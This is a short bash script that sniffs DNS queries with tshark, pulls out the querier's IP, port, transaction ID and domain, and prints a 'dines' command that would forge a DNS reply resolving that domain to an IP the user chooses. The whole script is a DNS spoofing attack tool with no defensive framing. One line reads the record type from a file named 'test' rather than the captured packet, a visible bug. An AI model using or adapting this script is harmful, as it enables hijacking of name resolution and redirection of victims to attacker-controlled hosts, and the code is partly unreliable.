#!/bin/bash

if [ "$1" == "" ];then
    echo "Usage: $0 <ip to give>"
    exit
fi

#which tshark
#if [ "$?" == "1" ];then
#    echo "You need tshark!"
#    exit
#fi

while true
do
    tshark -i any -V port 53 -c 1 > pkt 2> /dev/null
    IP=`cat pkt | grep "Internet Protocol" | cut -d " " -f 4`
    UDP_PORT=`cat pkt | grep "Source port" | cut -d " " -f 7`
    TRID_HEX=`cat pkt | grep Transaction | cut -d " " -f 7 | cut -d x -f 2 | sed -e 's/\(.\{2\}\)\(.\{2\}\)/\2\1/'`
    TRID=`echo $(( 16#$TRID_HEX ))`
    DOMAIN=`cat pkt | grep type | grep class | cut -d " " -f 9 | cut -d ":" -f 1`
    TYPE=`cat test | grep type | grep class | cut -d " " -f 11 | cut -d "," -f 1`
    echo ./dines --dst-ip $IP --sport 53 --dport $UDP_PORT --trid $TRID \
       --question $DOMAIN,$TYPE,1 \
       --answer $DOMAIN,$TYPE,1,60,$1
done
